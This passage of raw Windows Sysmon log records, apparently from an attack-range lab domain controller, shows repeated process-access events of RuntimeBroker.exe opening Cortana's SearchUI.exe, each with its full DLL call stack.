13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 